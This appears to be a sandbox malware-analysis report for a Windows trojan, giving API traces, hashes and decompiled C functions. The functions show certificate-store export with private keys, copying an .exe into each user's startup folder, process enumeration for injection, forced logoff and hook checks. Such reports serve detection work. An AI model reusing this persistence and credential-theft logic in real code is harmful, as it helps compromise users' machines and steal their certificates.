          • Part of subcall function 00406532: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00406573
          • Part of subcall function 00406532: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406649
          • Part of subcall function 00406532: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406668
          • Part of subcall function 00406532: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0040667A
          • Part of subcall function 00406532: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0040668C
          • Part of subcall function 00406532: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040669E
          • Part of subcall function 00406532: GetProcAddress.KERNEL32(LdrLoadDll), ref: 004066B0
          • Part of subcall function 00406532: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 004066C2
        • SetErrorMode.KERNEL32(00008007,00000000), ref: 004074DC
        • GetCommandLineW.KERNEL32(?), ref: 004074E6
        • CommandLineToArgvW.SHELL32(00000000), ref: 004074ED
        • LocalFree.KERNEL32(00000000), ref: 00407542
        • Sleep.KERNEL32(000000FF,?,00000001), ref: 00407598
        • ExitProcess.KERNEL32 ref: 004075A9
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
        • String ID:
        • API String ID: 1184560534-0
        • Opcode ID: 55c5115b710db870d711941d5ba89a68d526406fe218d105b82af10003c06d4f
        • Instruction ID: 0ea6b81123950f51a9b18faa6d3789d77b36d7889cd445f6f70f6cfe78326f6a
        • Opcode Fuzzy Hash: 55c5115b710db870d711941d5ba89a68d526406fe218d105b82af10003c06d4f
        • Instruction Fuzzy Hash: A52122B0D4D2447ACB1057B4AC487EE3B646F02308F1884BFE442B66E2C73DA94A875B
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0245B1FE(void** __ebx, void* __ecx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int* _a20, intOrPtr _a24) {
        				signed int _v8;
        				void* _t38;
        				signed int _t46;
        
        				 *_a20 = (_a4 ^ 0xf26341d4) + 0x24398beb;
        				_t38 = VirtualAlloc(0,  *( *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x194)))) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x194)))) + 0x3c)) + 0x50), 0x3000, 4); // executed
        				 *__ebx = _t38;
        				_v8 = (_a4 ^ 0xf26341d4) + 0x24398beb;
        				E0245B0E3(_a4, _a8, _a12, _a16, _a20, __ebx,  &_v8, _a24);
        				_t46 = (_a4 ^ 0xf26341d4) + 0x24398beb;
        				if( *__ebx != _t46) {
        					_t46 = ((_a12 ^ 0xf26341d4) + 0x24398beb) * _v8;
        					 *_a20 = _t46;
        				}
        				return _t46;
        			}

        APIs
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,C6F8E435,29A535C8,?,?,?,0245B36A,CFFEF5A6,29A535C1,?,?,C6F8E435,?), ref: 0245B24F
        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Similarity
        • API ID: AllocVirtual
        • String ID:
        • API String ID: 4275171209-0
        • Opcode ID: aa8c94f62c5062207a55c925a7dae50d217e875e72f691cef6857f2c11f38795
        • Instruction ID: 700379e8fb2f0112662db483f654c7c57a254cabdc54e541e0f30ca4a6b52f90
        • Opcode Fuzzy Hash: aa8c94f62c5062207a55c925a7dae50d217e875e72f691cef6857f2c11f38795
        • Instruction Fuzzy Hash: 6021C37A200109AFCB09CF58C891EAA7BE6EF8D354F144059FD059B391C671E921DB90
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        C-Code - Quality: 89%
        			E0040716E(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
        				char _v536;
        				void* _v540;
        				char _v544;
        				char _v644;
        				signed char _v648;
        				char _v748;
        				short _v760;
        				char _v764;
        				short _v772;
        				int _v776;
        				int _v780;
        				void _v781;
        				void* _v784;
        				char _v785;
        				void _v788;
        				void _v789;
        				void* _v792;
        				char _v793;
        				char _v797;
        				void* _v800;
        				void* _v804;
        				void* _v808;
        				char _v809;
        				int _v813;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* __ebp;
        				int _t74;
        				int _t79;
        				intOrPtr* _t80;
        				int _t82;
        				void* _t84;
        				int _t88;
        				void* _t92;
        				int _t100;
        				int _t108;
        				void* _t113;
        				int _t130;
        				void* _t145;
        				void* _t147;
        
        				_t136 = __ecx;
        				_t149 =  &_v764;
        				_v781 = 0;
        				if(E004160D5(0, __ecx,  &_v764,  *0x41e5ec) != 0) {
        					_v780 = _v760;
        					_t130 = E00406E6B( &_v780, __ecx, _v764);
        					_v776 = _t130;
        					if(_t130 == 0) {
        						_v780 = 0;
        					}
        					E0041617D( &_v764);
        				}
        				if(_v780 != 0x1e6) {
        					__eflags = _v780 - 0xc;
        					if(__eflags != 0) {
        						L41:
        						E00411106(_v772);
        						return _v785;
        					}
        					_t74 = E004069FD(_t136, __eflags, 0xf3f22264, 2);
        					_v776 = _t74;
        					__eflags = _t74;
        					if(_t74 == 0) {
        						L39:
        						__eflags = _a8 - 1;
        						if(_a8 == 1) {
        							E00412B6B(0, _t149,  *0x41e5ec);
        						}
        						goto L41;
        					}
        					E004069C2(0x5ef893a3,  &_v748, 1);
        					_t79 = E004147C3( &_v760);
        					_t149 = GetFileAttributesExW;
        					__eflags = _t79;
        					if(_t79 == 0) {
        						L23:
        						_t80 =  *0x41e594; // 0x0
        						__imp__IsWellKnownSid( *_t80, 0x16);
        						__eflags = _t80 - 1;
        						if(__eflags != 0) {
        							_v789 = 0;
        							_t82 = ReadProcessMemory(0xffffffff, _t149,  &_v789, 1, 0);
        							__eflags = _t82;
        							if(_t82 == 0) {
        								L29:
        								_push( *((intOrPtr*)(_v780 + 4)));
        								_t84 = E0041733C(_t136, E00404E04,  *((intOrPtr*)(_v780 + 8)));
        								_t149 = 0x41e5f0;
        								_v797 = E00404E04(_t84, 0, 0x41e5f0);
        								L30:
        								__eflags = _v793 - 1;
        								if(_v793 == 1) {
        									_t88 = E004129CD( &_v536, 0, _t149, 0,  &_v776);
        									__eflags = _t88;
        									_v813 = _t88 != 0;
        									__eflags = _v813;
        									if(_v813 != 0) {
        										E004069C2(0x18a9042b,  &_v760, 1);
        										_t92 = CreateEventW(0x41e5c8, 1, 0,  &_v772);
        										_t145 = _v788;
        										_v804 = _t92;
        										_v800 = _t145;
        										_push(0xffffffff);
        										__eflags = _t92;
        										if(_t92 != 0) {
        											WaitForMultipleObjects(2,  &_v792, 0, ??);
        										} else {
        											WaitForSingleObject(_t145, ??);
        										}
        										_t149 = CloseHandle;
        										__eflags = _v792;
        										if(_v792 != 0) {
        											CloseHandle(_v792);
        										}
        										CloseHandle(_v772);
        										CloseHandle(_t145);
        									}
        								}
        								L38:
        								E004147B3(_v780);
        								goto L39;
        							}
        							__eflags = _v789 - 0xe9;
        							if(_v789 != 0xe9) {
        								goto L29;
        							}
        							_t100 = GetFileAttributesExW(0x41e9fe, 0xf93f4793,  &_v788);
        							__eflags = _t100 - 1;
        							if(_t100 != 1) {
        								goto L29;
        							}
        							_push( *((intOrPtr*)(_v784 + 4)));
        							E0041733C(_t136, E00405170,  *_v784);
        							_push(_a4);
        							_t149 = 0x41e5f0;
        							_push( &_v544);
        							_v809 = E00405170( &_v544, 0x41e5f0);
        							VirtualFree(_v808, 0, 0x8000);
        							goto L30;
        						}
        						_v789 = E004054D0(__eflags);
        						goto L38;
        					} else {
        						goto L20;
        					}
        					while(1) {
        						L20:
        						_v781 = 0;
        						_t108 = ReadProcessMemory(0xffffffff, _t149,  &_v781, 1, 0);
        						__eflags = _t108;
        						if(_t108 == 0) {
        							goto L22;
        						}
        						__eflags = _v781 - 0xe9;
        						if(_v781 == 0xe9) {
        							goto L23;
        						}
        						L22:
        						Sleep(0x320);
        					}
        				}
        				if(E004050B9(_t136, _v772) != 0) {
        					E004069C2(0x4f164cf2,  &_v748, 1);
        					_t113 = CreateMutexW(0x41e5c8, 1,  &_v760);
        					_v792 = _t113;
        					if(_t113 != 0) {
        						if(GetLastError() == 0xb7) {
        							CloseHandle(_v780);
        							_v780 = 0;
        						}
        						if(_v780 != 0) {
        							E00404956(_t136,  &_v644);
        							if((_v648 & 0x00000020) != 0) {
        								 *0x41e590 =  *0x41e590 | 0x00000010;
        							}
        							E0040CC7E();
        							if(( *0x41e590 & 0x00000010) != 0) {
        								ExitWindowsEx(0x14, 0x80000000);
        							}
        							E004069C2(0x18a9042b,  &_v748, 1);
        							_t147 = OpenEventW(2, 0,  &_v760);
        							if(_t147 != 0) {
        								SetEvent(_t147);
        								CloseHandle(_t147);
        							}
        							E00406F28(1);
        							_v785 = 1;
        							CloseHandle(_v784);
        						}
        					}
        				}
        				goto L41;
        			}

        APIs
          • Part of subcall function 004160D5: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00407194,?,?,00000000), ref: 004160FA
          • Part of subcall function 004160D5: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000000), ref: 0041610D
        • CreateMutexW.KERNEL32(0041E5C8,00000001,?,4F164CF2,?,00000001,?), ref: 004071FE
        • GetLastError.KERNEL32 ref: 00407210
        • CloseHandle.KERNEL32(000001E6), ref: 00407227
        • ExitWindowsEx.USER32(00000014,80000000), ref: 0040726A
        • OpenEventW.KERNEL32(00000002,00000000,?,18A9042B,?,00000001), ref: 00407289
        • SetEvent.KERNEL32(00000000), ref: 00407296
        • CloseHandle.KERNEL32(00000000), ref: 0040729D
        • CloseHandle.KERNEL32(000001E6,00000001), ref: 004072AF
        • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000002,00000001,00000000,?,5EF893A3,?,00000001,F3F22264,00000002), ref: 00407313
        • Sleep.KERNEL32(00000320), ref: 00407325
        • IsWellKnownSid.ADVAPI32(00000000,00000016,?,5EF893A3,?,00000001,F3F22264,00000002), ref: 00407336
        • ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000000,00000001,00000000), ref: 0040735E
        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 004073BD
        • GetFileAttributesExW.KERNEL32(0041E9FE,F93F4793,0000000C), ref: 0040737A
          • Part of subcall function 0041733C: VirtualProtect.KERNEL32(00404E04,?,00000040,00000000,74B5F9B0,?,?,004073D9,?,?), ref: 00417351
          • Part of subcall function 0041733C: VirtualProtect.KERNEL32(00404E04,?,00000000,00000000,?,?,004073D9,?,?), ref: 00417384
          • Part of subcall function 00405170: lstrcmpiW.KERNEL32(?,004073AF,?,00000001,?,?), ref: 00405159
        • CreateEventW.KERNEL32(0041E5C8,00000001,00000000,?,18A9042B,?,00000001,00000001,?,00000000,0041E5F0,00000000,?,?,?), ref: 0040743B
        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407454
        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00407464
        • CloseHandle.KERNEL32(0000000C), ref: 0040747A
        • CloseHandle.KERNEL32(?), ref: 00407480
        • CloseHandle.KERNEL32(?), ref: 00407483
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindowslstrcmpi
        • String ID:
        • API String ID: 1256398583-3916222277
        • Opcode ID: a60166e17a67fd9d8af91a01021ddc3db473ee4acf7924f7616fbb16fa1c4e0d
        • Instruction ID: b01ae29f356be0270103fccafa78031ce2622bd96157ef09aa32b8ff476147dd
        • Opcode Fuzzy Hash: a60166e17a67fd9d8af91a01021ddc3db473ee4acf7924f7616fbb16fa1c4e0d
        • Instruction Fuzzy Hash: F291B071908345AFD710EF618D45E9F7FE8AB88314F00493EF984A22E2D7789958CB5B
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00414CC6() {
        				struct HINSTANCE__* _t2;
        				_Unknown_base(*)()* _t7;
        				void* _t9;
        
        				if( *0x41fe74 != 0) {
        					L9:
        					 *0x41fe74 =  *0x41fe74 + 1;
        					return 1;
        				} else {
        					_t2 = LoadLibraryA("cabinet.dll");
        					 *0x41fe70 = _t2;
        					if(_t2 == 0) {
        						L8:
        						return 0;
        					} else {
        						 *0x41f49c = GetProcAddress(_t2, "FCICreate");
        						 *0x41fe60 = GetProcAddress( *0x41fe70, "FCIAddFile");
        						 *0x41f094 = GetProcAddress( *0x41fe70, "FCIFlushCabinet");
        						_t7 = GetProcAddress( *0x41fe70, "FCIDestroy");
        						 *0x41fe68 = _t7;
        						if( *0x41f49c == 0 ||  *0x41fe60 == 0 ||  *0x41f094 == 0 || _t7 == 0) {
        							L7:
        							FreeLibrary( *0x41fe70);
        							goto L8;
        						} else {
        							_t9 = HeapCreate(0, 0x80000, 0);
        							 *0x41f090 = _t9;
        							if(_t9 != 0) {
        								goto L9;
        							} else {
        								goto L7;
        							}
        						}
        					}
        				}
        			}

        APIs
        • LoadLibraryA.KERNEL32(cabinet.dll,00000000,00414DAD,?,00414FC9,?,?,00000000,?,?), ref: 00414CDA
        • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00414CFA
        • GetProcAddress.KERNEL32(FCIAddFile), ref: 00414D0C
        • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00414D1E
        • GetProcAddress.KERNEL32(FCIDestroy), ref: 00414D30
        • HeapCreate.KERNEL32(00000000,00080000,00000000,00414FC9,?,?,00000000,?,?), ref: 00414D5B
        • FreeLibrary.KERNEL32(00414FC9,?,?,00000000,?,?), ref: 00414D70
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressProc$Library$CreateFreeHeapLoad
        • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
        • API String ID: 2040708800-1163896595
        • Opcode ID: 40ad21179cc0d0d57515cc7f1e056a5fa796b7adb53692985f17ebad144cee0c
        • Instruction ID: 42619e3df030fa642841065636bc994e2d2a8913b0e9a6fcf823fb982b3f698d
        • Opcode Fuzzy Hash: 40ad21179cc0d0d57515cc7f1e056a5fa796b7adb53692985f17ebad144cee0c
        • Instruction Fuzzy Hash: 69115E74940B10DACB219F75BC05AD63E61B7EA7213208737E608A2271E7BA048BCE4D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 81%
        			E004054D0(void* __eflags) {
        				char _v5;
        				char* _v12;
        				char _v16;
        				int _v20;
        				int _v24;
        				int _v28;
        				int _v32;
        				char _v56;
        				char _v88;
        				char _v608;
        				short _v1128;
        				char _v1648;
        				void* __edi;
        				void* __esi;
        				_Unknown_base(*)()* _t63;
        				int _t69;
        				char _t70;
        				char _t76;
        				int _t80;
        				char _t81;
        				char _t82;
        				char _t86;
        				char _t88;
        				WCHAR* _t98;
        				int _t99;
        				CHAR* _t110;
        				char* _t111;
        				WCHAR* _t112;
        				struct HINSTANCE__* _t113;
        				signed int _t114;
        				void* _t115;
        
        				_t112 =  &_v56;
        				_v5 = 0;
        				E0040CA33(0xe1, _t112);
        				_t113 = LoadLibraryW(_t112);
        				if(_t113 == 0) {
        					L7:
        					return 0;
        				} else {
        					_t110 =  &_v88;
        					E0040C9FD(0xe2, _t110);
        					_t63 = GetProcAddress(_t113, _t110);
        					if(_t63 != 0) {
        						_push( &_v12);
        						_t106 =  &_v608;
        						_push( &_v608);
        						_v12 = 0x104;
        						if( *_t63() == 1) {
        							_t98 =  &_v1128;
        							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
        							if(_t98 == 0) {
        								_t106 =  &_v608;
        								_t99 = E00411C55(_t106);
        								_v12 = _t99;
        								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
        									_t106 = _t115 + _v12 * 2 - 0x464;
        									E004114A7(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
        									_v5 = 1;
        								}
        							}
        						}
        					}
        					FreeLibrary(_t113);
        					if(_v5 != 0) {
        						_v5 = 0;
        						_v28 = 0;
        						_t111 = L".exe";
        						do {
        							_v12 = 0;
        							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
        							_v24 = _t69;
        							__eflags = _t69;
        							if(_t69 == 0) {
        								L11:
        								__eflags = _v12;
        								if(_v12 == 0) {
        									goto L24;
        								}
        								_t114 = 0;
        								__eflags = _v20;
        								if(_v20 <= 0) {
        									L23:
        									NetApiBufferFree(_v12);
        									goto L24;
        								} else {
        									goto L13;
        								}
        								do {
        									L13:
        									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
        									__eflags = _t80;
        									if(_t80 == 0) {
        										_t81 = _v16;
        										__eflags = _t81;
        										if(_t81 != 0) {
        											_t106 =  &_v608;
        											_t82 = E00407A1F( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
        											__eflags = _t82;
        											if(_t82 != 0) {
        												_t86 = E00416745( &_v1128,  &_v608,  &_v608);
        												__eflags = _t86;
        												if(_t86 != 0) {
        													_t88 = E004164C7( &_v608);
        													__eflags = _t88;
        													if(_t88 != 0) {
        														__eflags = E0041545F(0,  &_v608,  &_v1648, _t111, 6);
        														if(__eflags != 0) {
        															__eflags = E00404BCF( &_v608, __eflags, 0,  &_v1648, 0);
        															if(__eflags != 0) {
        																_v5 = 1;
        																E00404CFC( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
        															}
        														}
        													}
        												}
        											}
        											NetApiBufferFree(_v16);
        										}
        									}
        									_t114 = _t114 + 1;
        									__eflags = _t114 - _v20;
        								} while (_t114 < _v20);
        								goto L23;
        							}
        							__eflags = _t69 - 0xea;
        							if(_t69 != 0xea) {
        								break;
        							}
        							goto L11;
        							L24:
        							__eflags = _v24 - 0xea;
        						} while (_v24 == 0xea);
        						_t70 =  &_v1128;
        						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
        						__eflags = _t70;
        						if(_t70 == 0) {
        							__eflags = E0041545F(0,  &_v1128,  &_v1648, _t111, 6);
        							if(__eflags != 0) {
        								_t76 = E00404BCF(_t106, __eflags, 0,  &_v1648, 0);
        								__eflags = _t76;
        								if(_t76 != 0) {
        									_v5 = 1;
        								}
        							}
        						}
        						return _v5;
        					}
        					goto L7;
        				}
        			}

        APIs
        • LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 004054F1
        • GetProcAddress.KERNEL32(00000000,?), ref: 00405512
        • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00405543
        • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00405566
        • FreeLibrary.KERNEL32(00000000), ref: 0040558D
        • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 004055C3
        • NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 004055FC
        • NetApiBufferFree.NETAPI32(?,?,?), ref: 00405695
        • NetApiBufferFree.NETAPI32(?), ref: 004056A8
        • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 004056CC
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
        • String ID: .exe
        • API String ID: 1753652487-4119554291
        • Opcode ID: 5bfb45865e912f606f096a2f89e5b46878cd5fb620fb21273b726c69df47988a
        • Instruction ID: c3020d851ccc26ff2fbd83f29f49db3501f5d447b743aa2e7efefd50582d58cf
        • Opcode Fuzzy Hash: 5bfb45865e912f606f096a2f89e5b46878cd5fb620fb21273b726c69df47988a
        • Instruction Fuzzy Hash: 51618FB1900618BEDF20DBA4CD84EEF77BDEB45304F0045BAE516F3191E63A9A458F68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 58%
        			E00412A28(void* _a4, WCHAR* _a8) {
        				WCHAR* _v5;
        				char _v12;
        				signed int _v16;
        				struct HINSTANCE__* _v20;
        				_Unknown_base(*)()* _v24;
        				struct _PROCESS_INFORMATION _v40;
        				struct _STARTUPINFOW _v108;
        				struct HINSTANCE__* _t28;
        				_Unknown_base(*)()* _t31;
        				WCHAR* _t49;
        				long _t50;
        				intOrPtr* _t52;
        
        				_v5 = 0;
        				_t28 = LoadLibraryA("userenv.dll");
        				_v20 = _t28;
        				if(_t28 != 0) {
        					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
        					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
        					_v24 = _t31;
        					if(_t52 != 0 && _t31 != 0) {
        						_push(0);
        						_push(_a4);
        						_push( &_v16);
        						_v16 = 0;
        						if( *_t52() == 0) {
        							_v16 = 0;
        						}
        						_t50 = 0x44;
        						_v12 = 0;
        						E004111B9( &_v108,  &_v108, 0, _t50);
        						_t49 = _a8;
        						_v108.cb = _t50;
        						_v108.lpDesktop = 0;
        						if(_t49 == 0) {
        							_t49 =  &_v12;
        						}
        						asm("sbb eax, eax");
        						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
        							CloseHandle(_v40.hThread);
        							CloseHandle(_v40);
        							_v5 = _v40.dwProcessId != 0;
        						}
        						if(_v16 != 0) {
        							_v24(_v16);
        						}
        					}
        					FreeLibrary(_v20);
        				}
        				return _v5 & 0x000000ff;
        			}

        APIs
        • LoadLibraryA.KERNEL32(userenv.dll,00000001), ref: 00412A39
        • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00412A58
        • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00412A64
        • CreateProcessAsUserW.ADVAPI32(?,00000000,00404CDF,00000000,00000000,00000000,00404CDF,00404CDF,00000000,?,?,?,00000000,00000044), ref: 00412AD5
        • CloseHandle.KERNEL32(?), ref: 00412AE8
        • CloseHandle.KERNEL32(?), ref: 00412AED
        • FreeLibrary.KERNEL32(?), ref: 00412B04
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
        • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
        • API String ID: 3080530829-1103369309
        • Opcode ID: 953ce3b63382c2c1c06d1cce245669a77c3f945d6333d5eb825670dd553495e1
        • Instruction ID: 071d21bc6105e380eaf32e00cad22d89230e94e024edf5a20d1654d08ddf1f32
        • Opcode Fuzzy Hash: 953ce3b63382c2c1c06d1cce245669a77c3f945d6333d5eb825670dd553495e1
        • Instruction Fuzzy Hash: 872138B2D0021DAFDF119FE5CD84DEEBBBCEB48344B10846AE501F2160D6799D54CB68
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CertOpenSystemStoreW.CRYPT32(00000000,004030F4), ref: 00407627
        • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00407643
        • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0040764F
        • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040768E
        • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 004076BE
        • CharLowerW.USER32 ref: 004076DC
        • GetSystemTime.KERNEL32(?), ref: 004076E7
        • CertCloseStore.CRYPT32(?,00000000), ref: 00407770
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
        • String ID:
        • API String ID: 3751268071-0
        • Opcode ID: 4206e53aa1f201fa251bdefe66059e2c7e0011a6bb500393fd4e1cd4083f39cd
        • Instruction ID: f17d779ae3f930988307aed512631a89c7cf389f71526a299710c20dc0180d40
        • Opcode Fuzzy Hash: 4206e53aa1f201fa251bdefe66059e2c7e0011a6bb500393fd4e1cd4083f39cd
        • Instruction Fuzzy Hash: B141C671508341ABD710AF65CD81EABBBDCAB88744F00093FB684E32A0D638ED458767
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040CC7E() {
        				char _v5;
        				signed int _v12;
        				signed int _v16;
        				void* _v20;
        				int _v24;
        				void* _v28;
        				char _v32;
        				long _v588;
        				void* _v596;
        				void* __esi;
        				void* _t42;
        				struct tagPROCESSENTRY32W* _t45;
        				signed int _t47;
        				void* _t48;
        				long _t56;
        				intOrPtr* _t57;
        				void** _t59;
        				void** _t60;
        				void** _t62;
        				long _t65;
        				int _t71;
        				void** _t72;
        				void* _t73;
        
        				_t71 = 0;
        				_v5 = 0;
        				_v16 = 0;
        				_v12 = 0;
        				while(1) {
        					_t42 = CreateToolhelp32Snapshot(2, _t71);
        					_v20 = _t42;
        					_v24 = _t71;
        					if(_t42 == 0xffffffff) {
        						break;
        					} else {
        						_t45 =  &_v596;
        						_v596 = 0x22c;
        						Process32FirstW(_v20, _t45);
        					}
        					while(_t45 != 0) {
        						_t65 = _v588;
        						__eflags = _t65 - _t71;
        						if(_t65 <= _t71) {
        							L20:
        							_t45 = Process32NextW(_v20,  &_v596);
        							continue;
        						}
        						__eflags = _t65 -  *0x41e800; // 0x0
        						if(__eflags == 0) {
        							goto L20;
        						}
        						_t47 = 0;
        						__eflags = _v12 - _t71;
        						if(_v12 <= _t71) {
        							L8:
        							_t48 = E00406946(_t65, _t70, _t65);
        							_v28 = _t48;
        							__eflags = _t48 - _t71;
        							if(_t48 == _t71) {
        								goto L20;
        							}
        							_t73 = OpenProcess(0x400, _t71, _v588);
        							__eflags = _t73 - _t71;
        							if(_t73 == _t71) {
        								L19:
        								CloseHandle(_v28);
        								goto L20;
        							}
        							_t72 = E0041271D(_t65, _t73,  &_v32);
        							CloseHandle(_t73);
        							__eflags = _t72;
        							if(_t72 == 0) {
        								L18:
        								_t71 = 0;
        								__eflags = 0;
        								goto L19;
        							} else {
        								__eflags = _v32 -  *0x41e5a0; // 0x0
        								if(__eflags == 0) {
        									_t56 = GetLengthSid( *_t72);
        									__eflags = _t56 -  *0x41e598;
        									if(_t56 ==  *0x41e598) {
        										_t57 =  *0x41e594; // 0x0
        										_t59 = E00411177( *_t57,  *_t72, _t56);
        										__eflags = _t59;
        										if(_t59 == 0) {
        											_t60 = E00411091(4 + _v12 * 4,  &_v16);
        											__eflags = _t60;
        											if(_t60 != 0) {
        												_t70 = _v12;
        												_v12 = _v12 + 1;
        												_v24 = _v24 + 1;
        												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v588;
        												_t62 = E0040CBF5(_v16, _v588, _v28);
        												__eflags = _t62;
        												if(_t62 != 0) {
        													_v5 = 1;
        												}
        											}
        										}
        									}
        								}
        								E00411106(_t72);
        								goto L18;
        							}
        						} else {
        							goto L6;
        						}
        						while(1) {
        							L6:
        							_t70 = _v16;
        							__eflags =  *((intOrPtr*)(_t70 + _t47 * 4)) - _t65;
        							if( *((intOrPtr*)(_t70 + _t47 * 4)) == _t65) {
        								goto L20;
        							}
        							_t47 = _t47 + 1;
        							__eflags = _t47 - _v12;
        							if(_t47 < _v12) {
        								continue;
        							}
        							goto L8;
        						}
        						goto L20;
        					}
        					CloseHandle(_v20);
        					if(_v24 != _t71) {
        						continue;
        					}
        					break;
        				}
        				E00411106(_v16);
        				return _v5;
        			}

        APIs
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CC9F
        • Process32FirstW.KERNEL32(000001E6,?), ref: 0040CCC8
        • OpenProcess.KERNEL32(00000400,00000000,?,?,?,74B5F560,00000000), ref: 0040CD23
        • CloseHandle.KERNEL32(00000000,00000000,?,?,74B5F560,00000000), ref: 0040CD40
        • GetLengthSid.ADVAPI32(00000000,?,74B5F560,00000000), ref: 0040CD53
        • CloseHandle.KERNEL32(?,?,74B5F560,00000000), ref: 0040CDC0
        • Process32NextW.KERNEL32(000001E6,0000022C), ref: 0040CDCC
        • CloseHandle.KERNEL32(000001E6,?,74B5F560,00000000), ref: 0040CDDD
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
        • String ID:
        • API String ID: 1981844004-0
        • Opcode ID: c6dd252536e6a693f50f88c2bd1e5f68a5863876f8c0340e1bc9243fbdd20ecf
